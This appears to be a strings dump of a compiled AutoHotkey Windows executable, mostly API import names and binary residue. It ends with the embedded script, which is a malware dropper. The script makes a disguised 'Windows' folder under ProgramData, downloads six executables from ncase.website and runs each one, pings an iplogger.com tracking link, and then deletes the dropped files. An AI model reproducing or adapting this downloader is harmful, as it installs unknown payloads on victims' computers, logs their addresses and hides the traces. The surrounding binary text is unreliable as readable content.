]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
SendInput
KbdLayerDescriptor
RtlGetVersion
RemoveClipboardFormatListener
AddClipboardFormatListener
BlockInput
GetProcessId
""""&*.266::>>>CCCCCHMMVV$
GetLayeredWindowAttributes
EnumDisplayMonitors
GetMonitorInfoW
GetDiskFreeSpaceExW
GetCursorInfo
CreateProcessWithLogonW
InternetOpenW
InternetOpenUrlW
InternetCloseHandle
InternetReadFileExA
InternetReadFile
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
AtlAxGetControl
AtlAxWinInit
StrCmpLogicalW
SetMenuInfo
RegDeleteKeyExW
GdiplusStartup
GdiplusShutdown
GdipCreateBitmapFromFile
GdipCreateHBITMAPFromBitmap
GdipDisposeImage
SetWindowTheme
EnableThemeDialogTexture
IsAppThemed
IsHungAppWindow
Error text not found (please report)
DEFINE
UTF16)
NO_START_OPT)
ANYCRLF)
BSR_ANYCRLF)
BSR_UNICODE)
argument is not a compiled regular expression
argument is compiled in 8 bit mode
internal error: opcode not recognized
internal error: missing capturing bracket
failed to get memory
Access violation - no RTTI data!
Bad dynamic_cast!
2]fQ	?5!
?UUUUUU
?UUUUUU
?UUUUUU
?UUUUUU
UUUUUU
UUUUUU
UUUUUU
UUUUUU
"e?<<<<<<l?
Il?333333c?
.i?0@I
d?000000`?
)|B?d!
L?UUUUUUU?
&?PPPPPPP?
0X8b?~
%GoU?*
(T?j?Y
Zod(^?
D W?{W
qS>g?h3
c?FA@s}
UUUUUU
UUUUUU
?UUUUUU
?UUUUUU
?UUUUUU
UUUUUU
UUUUUU
@^8U)zj
?8bunz8
?@En[vP
[*ncd>0
S>$hkDh$h>[2
UA>N0Wl
A03>A|
Q5rHg,>
j>>A?1
.>PJ;I:qE>
:>t6k'
])6M>&
CWD>~3
:>)*	v
_oD>Kg
N>O=I9
F>qUxv
/2GG>!B
zY;>u:m	
P>q_Y~
0><[cZUg^>
Y>kX>M
H[><y5
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
.gfids$x
.gfids$y
.tls$ZZZ
.rsrc$01
.rsrc$02
?t @7d
WSOCK32.dll
joyGetPosEx
mciSendStringW
mixerOpen
mixerGetDevCapsW
mixerGetLineInfoW
mixerClose
mixerGetLineControlsW
mixerGetControlDetailsW
mixerSetControlDetails
waveOutGetVolume
waveOutSetVolume
joyGetDevCapsW
WINMM.dll
GetFileVersionInfoSizeW
GetFileVersionInfoW
VerQueryValueW
VERSION.dll
ImageList_GetIconSize
ImageList_Create
ImageList_Destroy
ImageList_AddMasked
ImageList_ReplaceIcon
CreateStatusWindowW
COMCTL32.dll
GetProcessImageFileNameW
GetModuleBaseNameW
GetModuleFileNameExW
PSAPI.DLL
MulDiv
GetTickCount
SetCurrentDirectoryW
InitializeCriticalSection
SetErrorMode
GetCurrentDirectoryW
GlobalLock
GlobalAlloc
GlobalFree
GlobalUnlock
GetCurrentThreadId
lstrcmpiW
GetStringTypeExW
CreateThread
SetThreadPriority
GetExitCodeThread
CloseHandle
CreateMutexW
GetLastError
GetProcAddress
GetModuleHandleW
LoadLibraryW
FreeLibrary
GetVersionExW
GetCPInfo
DeleteCriticalSection
GetModuleFileNameW
GetSystemTimeAsFileTime
FindResourceW
SizeofResource
LoadResource
LockResource
FindFirstFileW
FindNextFileW
FindClose
FileTimeToLocalFileTime
SetEnvironmentVariableW
MoveFileW
OutputDebugStringW
CreateProcessW
GetFileAttributesW
WideCharToMultiByte
MultiByteToWideChar
GetExitCodeProcess
WriteProcessMemory
ReadProcessMemory
GetCurrentProcessId
OpenProcess
TerminateProcess
SetPriorityClass
SetLastError
GetEnvironmentVariableW
GetLocalTime
GetDateFormatW
GetTimeFormatW
GetDiskFreeSpaceW
SetVolumeLabelW
CreateFileW
DeviceIoControl
GetDriveTypeW
GetVolumeInformationW
CreateDirectoryW
ReadFile
WriteFile
DeleteFileW
SetFileAttributesW
LocalFileTimeToFileTime
SetFileTime
GetFileSizeEx
GetSystemTime
GetSystemDefaultUILanguage
GetComputerNameW
GetWindowsDirectoryW
GetTempPathW
GetFullPathNameW
GetShortPathNameW
EnterCriticalSection
LeaveCriticalSection
VirtualProtect
QueryDosDeviceW
CompareStringW
RemoveDirectoryW
CopyFileW
GetCurrentProcess
FormatMessageW
GetPrivateProfileStringW
GetPrivateProfileSectionW
GetPrivateProfileSectionNamesW
WritePrivateProfileStringW
WritePrivateProfileSectionW
SetEndOfFile
GetACP
GetFileType
GetStdHandle
SetFilePointerEx
SystemTimeToFileTime
FileTimeToSystemTime
GetFileSize
IsWow64Process
VirtualAllocEx
VirtualFreeEx
EnumResourceNamesW
LoadLibraryExW
GlobalSize
KERNEL32.DLL
IsClipboardFormatAvailable
CharUpperW
GetDlgCtrlID
GetParent
SetTimer
GetMessageW
GetForegroundWindow
GetWindowThreadProcessId
GetClassNameW
GetFocus
PeekMessageW
KillTimer
TranslateAcceleratorW
GetKeyState
GetWindowLongW
IsWindowEnabled
SendMessageW
IsDialogMessageW
ScreenToClient
SetWindowLongW
CountClipboardFormats
ShowWindow
TranslateMessage
DispatchMessageW
IsWindow
EndDialog
FindWindowW
PostMessageW
EmptyClipboard
SetClipboardData
CloseClipboard
GetClipboardFormatNameW
GetClipboardData
OpenClipboard
ReleaseDC
CharLowerW
CallNextHookEx
GetKeyboardLayout
ToUnicodeEx
IsCharLowerW
IsCharUpperW
IsCharAlphaNumericW
PostThreadMessageW
SetWindowsHookExW
UnhookWindowsHookEx
SendMessageTimeoutW
PostQuitMessage
RegisterHotKey
UnregisterHotKey
SendInput
AttachThreadInput
GetAsyncKeyState
GetCursorPos
GetKeyboardState
SetKeyboardState
keybd_event
GetSystemMetrics
WindowFromPoint
mouse_event
GetWindowTextW
GetGUIThreadInfo
ActivateKeyboardLayout
GetKeyboardLayoutNameW
MapVirtualKeyExW
VkKeyScanExW
MapVirtualKeyW
IsCharAlphaW
DestroyWindow
DestroyIcon
LoadCursorW
RegisterClassExW
CreateWindowExW
GetMenu
EnableMenuItem
LoadAcceleratorsW
SetClipboardViewer
ChangeClipboardChain
LoadImageW
MessageBoxW
CheckMenuItem
IsWindowVisible
SetWindowTextW
GetIconInfo
SetRect
DrawTextW
AdjustWindowRectEx
SystemParametersInfoW
GetClientRect
GetWindowRect
GetQueueStatus
MoveWindow
EnumChildWindows
SetActiveWindow
SetFocus
SetWindowRgn
SetWindowPos
SetLayeredWindowAttributes
InvalidateRect
EnableWindow
GetWindowTextLengthW
EnumWindows
IsZoomed
IsIconic
RegisterWindowMessageW
GetSysColor
GetSysColorBrush
DrawIconEx
FillRect
DefWindowProcW
SetForegroundWindow
DialogBoxParamW
SendDlgItemMessageW
GetDlgItem
SetDlgItemTextW
MessageBeep
ClientToScreen
GetCursor
GetLastInputInfo
GetSystemMenu
GetMenuItemCount
GetMenuItemID
GetSubMenu
GetMenuStringW
ExitWindowsEx
SetMenu
FlashWindow
GetPropW
SetPropW
RemovePropW
MapWindowPoints
RedrawWindow
SetWindowLongPtrW
SetParent
GetClassInfoExW
GetAncestor
UpdateWindow
GetMessagePos
GetClassLongPtrW
DefDlgProcW
CallWindowProcW
CheckRadioButton
IntersectRect
GetUpdateRect
PtInRect
CreateDialogIndirectParamW
GetWindowLongPtrW
CreateAcceleratorTableW
DestroyAcceleratorTable
InsertMenuItemW
SetMenuDefaultItem
RemoveMenu
SetMenuItemInfoW
IsMenu
GetMenuItemInfoW
CreateMenu
CreatePopupMenu
SetMenuInfo
AppendMenuW
DestroyMenu
TrackPopupMenuEx
GetDesktopWindow
CopyImage
CreateIconIndirect
CreateIconFromResourceEx
EnumClipboardFormats
GetWindow
BringWindowToTop
GetTopWindow
USER32.dll
GetDeviceCaps
DeleteObject
CreateFontW
CreateSolidBrush
CreateDCW
GetStockObject
SelectObject
GetTextFaceW
GetTextMetricsW
GetObjectW
DeleteDC
CreateEllipticRgn
CreateRoundRectRgn
CreateRectRgn
CreatePolygonRgn
CreateCompatibleDC
GetDIBits
GetSystemPaletteEntries
CreateCompatibleBitmap
BitBlt
GetPixel
SetBkColor
SetTextColor
ExcludeClipRect
GetClipRgn
FillRgn
GetClipBox
GetCharABCWidthsW
SetBkMode
CreatePatternBrush
SetBrushOrgEx
EnumFontFamiliesExW
CreateDIBSection
GdiFlush
GDI32.dll
GetSaveFileNameW
GetOpenFileNameW
CommDlgExtendedError
COMDLG32.dll
RegConnectRegistryW
RegCloseKey
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumValueW
RegEnumKeyExW
GetUserNameW
OpenSCManagerW
LockServiceDatabase
UnlockServiceDatabase
CloseServiceHandle
OpenProcessToken
LookupPrivilegeValueW
AdjustTokenPrivileges
RegQueryValueExW
RegCreateKeyExW
RegSetValueExW
RegDeleteKeyW
RegDeleteValueW
ADVAPI32.dll
DragQueryFileW
DragFinish
Shell_NotifyIconW
ShellExecuteExW
SHGetFolderPathW
SHGetMalloc
SHGetDesktopFolder
SHBrowseForFolderW
SHGetPathFromIDListW
SHFileOperationW
SHEmptyRecycleBinW
DragQueryPoint
ExtractIconW
SHELL32.dll
OleInitialize
OleUninitialize
CoCreateInstance
CoInitialize
CoUninitialize
CLSIDFromString
CoGetObject
StringFromGUID2
CreateStreamOnHGlobal
ole32.dll
OLEAUT32.dll
SetEvent
ResetEvent
WaitForSingleObjectEx
CreateEventW
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
IsProcessorFeaturePresent
QueryPerformanceCounter
InitializeSListHead
RtlPcToFileHeader
EncodePointer
RaiseException
RtlUnwindEx
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetCommandLineA
GetCommandLineW
ExitProcess
GetModuleHandleExW
HeapSize
HeapReAlloc
HeapQueryInformation
HeapFree
HeapAlloc
LCMapStringW
GetStringTypeW
GetConsoleCP
GetConsoleMode
GetProcessHeap
FindFirstFileExW
IsValidCodePage
GetOEMCP
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
FlushFileBuffers
WriteConsoleW
ReadConsoleW
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AUIObject@@
.?AVComObject@@
.?AVTextMem@@
.?AVTextFile@@
.?AVExprOpFunc@@
.?AVTextStream@@
.?AVProperty@@
.?AVObjectBase@@
.?AVLabel@@
.?AUIObjectComCompatible@@
.?AUIDispatch@@
.?AUIUnknown@@
.?AVObject@@
.?AVFunc@@
.?AV?$CKuStringT@_WVCKuStringUtilW@@@@
.?AVRegExMatchObject@@
.?AVCStringWCharFromChar@@
.?AVCStringCharFromWChar@@
.?AV?$CKuStringT@DVCKuStringUtilA@@@@
.?AVComArrayEnum@@
.?AVComEnum@@
.?AVComEvent@@
.?AVEnumBase@@
.?AVBoundFunc@@
.?AVMetaObject@@
.?AVEnumerator@Object@@
.?AVFileObject@@
.?AV__non_rtti_object@std@@
.?AVbad_typeid@std@@
.?AVbad_cast@std@@
*--<[_az
*((4FFC]mol
&%&lbbc
[MMxH<<\3,,A)##4
/)##<&  4 
'+,:TY[s
%EGB_svo
<88Ktmm
'''5ZZZp
!!!('''/
4228BAAK
XKKoE;;U<33J%  3
G<<Z'!!/
.02?R]g}
$%#3EKKeu
?A<Wike
0..;]]Zz
(''4SNNi
>>>Ovuu
:::X^^^
_(  q#
eeez@@@[322G
YLLlK??\<33K-&&8%
eTT{M@@a3++?"
; <COMPILER: v1.1.28.02>
#SingleInstance force
#NoTrayIcon
FileCreateDir, %Programdata%\Windows
SetWorkingDir, %Programdata%\Windows
URLDownloadToFile, http://ncase.website/load/sng/run1.exe, run1.exe
While !FileExist("run1.exe")
Continue
sleep 1000
Run, run1.exe,, UseErrorLevel
URLDownloadToFile, http://ncase.website/load/sng/run2.exe, run2.exe
While !FileExist("run2.exe")
Continue
sleep 1000
Run, run2.exe,, UseErrorLevel
URLDownloadToFile, http://ncase.website/load/sng/run3.exe, run3.exe
While !FileExist("run3.exe")
Continue
sleep 1000
Run, run3.exe,, UseErrorLevel
URLDownloadToFile, http://ncase.website/load/ya/run4.exe, run4.exe
While !FileExist("run4.exe")
Continue
sleep 1000
Run, run4.exe,, UseErrorLevel
URLDownloadToFile, http://ncase.website/load/ya/run5.exe, run5.exe
While !FileExist("run5.exe")
Continue
sleep 1000
Run, run5.exe,, UseErrorLevel
URLDownloadToFile, http://ncase.website/load/ya/run6.exe, run6.exe
While !FileExist("run6.exe")
Continue
sleep 1000
Run, run6.exe,, UseErrorLevel
UrlDownloadToFile, https://iplogger.com/1YHp67, jopa.txt
Sleep, 60000
FileDelete, %Programdata%\Windows\*
ExitApp